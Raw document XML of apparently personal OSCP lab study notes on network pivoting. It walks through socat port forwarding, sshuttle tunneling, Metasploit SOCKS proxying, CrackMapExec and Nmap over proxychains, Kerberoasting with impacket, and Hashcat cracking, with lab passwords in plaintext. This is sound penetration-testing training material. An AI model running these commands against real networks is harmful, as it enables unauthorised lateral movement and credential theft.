    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In our lab environment, we have SSH access to PGDATABASE01, which we can access through a port forward set up on CONFLUENCE01. Let's run sshuttle through this to observe its capabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000092E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="502" name="image476.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image476.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId183"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="568"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There was no diagram for the sshuttle section, but this is the closest one I can find. Ignore all the SSH stuff on this diagram. Basically, what sshuttle is trying to do in this section is connect from Kali to the HRSHARES machine, which is the machine on the far right. And it does this using socat and sshuttle</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t xml:space="preserve">First, we can set up a port forward in a shell on CONFLUENCE01, listening on port 2222 on the WAN interface and forwarding to port 22 on PGDATABASE01.</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socat TCP-LISTEN:2222,fork TCP:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000934">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1108"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01 (Jump1) and target PGDATABASE01 (Jump2) on port 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000935">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, specifying the SSH connection string we want to use, as well as the subnets that we want to tunnel through this connection (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sshuttle -r database_admin@192.168.50.63:2222 10.4.50.0/24 172.16.50.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000938">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify these two subnets (the DMZ and INTERNAL subnets)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000939">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These are the destination networks that you want to access through the tunnel. You're saying:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Whenever I try to access anything in the 10.4.50.0/24 or 172.16.50.0/24 subnets, route that traffic through the SSH tunnel instead of my normal default route."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000093B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1136"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Include all the subnets needed to get to the target subnet, which in this case is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.4.50.0/24</w:t>
      </w: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Although we don't receive much output from sshuttle, in theory, it should have set up the routing on our Kali machine so that any requests we make to hosts in the subnets we specified will be pushed transparently through the SSH connection. Let's test if this is working by trying to connect to the SMB share on HRSHARES in a new terminal.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234</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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! We're now connecting to HRSHARES transparently, as though we are on the same network and have direct access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000942">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this section, we used sshuttle to create a VPN-like environment. We were then able to connect transparently to HRSHARES from our Kali machine, as though we were on the same network as PGDATABASE01.</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5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e78x9zxnt8r9" w:id="82"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Forwarding with Windows Tools</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 19.4. Port Forwarding with Windows Tools</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This includes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000094A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000094B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Plink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000094C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Netsh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1driqwbpvfv8" w:id="83"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up SOCKS5 Proxy to access internal network</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More information about using SOCKS5 proxy can be found in the "</w:t>
      </w:r>
      <w:hyperlink w:anchor="_ry7a9yveemk4">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Pivoting with Metasploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sub-section, within the "Metasploit" section </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From OSCP (27.4.2. Services and Sessions)</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We can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/server/socks_proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a SOCKS5 proxy to access the internal network from our Kali box as we learned in the "The Metasploit Framework" Module.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5133109" cy="3529013"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="154" name="image149.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image149.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId200"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5133109"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set session 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000095F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SRVHOST 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000960">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set VERSION 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="410"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run -j</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t xml:space="preserve">The SOCKS5 proxy is now active, and we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access the internal network. Let's confirm that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/proxychains4.conf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> still contains the necessary settings from previous Modules. Meaning, only the SOCKS5 entry from the following listing should be active.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="927100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="556" name="image535.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image535.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/proxychains4.conf</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Finally, we are set up to enumerate the network via Proxychains.</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Let's begin with CrackMapExec's SMB module to retrieve basic information of the identified servers (such as SMB settings). We'll also provide the credentials for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list the SMB shares and their permissions with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--shares</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Because CrackMapExec doesn't have an option to specify an output file, we'll copy the results manually and store them in a file.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares</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t xml:space="preserve">Next, let's use Nmap to perform a port scan on ports commonly used by web applications and FTP servers targeting MAILSRV1, DCSRV1, and INTERNALSRV1. We must specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254</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t xml:space="preserve">Next, we found that a website was open on 172.16.6.241 that we want to browse, and we could use SOCKS5 proxy and proxychains to browse, but Chisel provides a more stable and interactive browser session, so we will use that. Look at the the  "Tunneling using Chisel" for more information</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Later in the same module, we found that a user (daniela) was kerberoastable using the pre-built "List all Kerberoastable Accounts" query. So, we can perform Kerberoasting on Kali with impacket-GetUserSPNs over the SOCKS5 proxy using Proxychains. To obtain the TGS-REP hash for daniela, we must provide the credentials of a domain user. Because we only have one valid set of credentials, we'll use john.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5024438" cy="3124169"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="427" name="image414.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image414.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId202"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5024438" cy="3124169"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="880"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john</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Let's store the hash in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/kali/beyond/daniela.hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and launch Hashcat to crack it.</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2374900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="289" name="image302.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image302.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="681"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000009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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vxkjph5mq543" w:id="84"/>
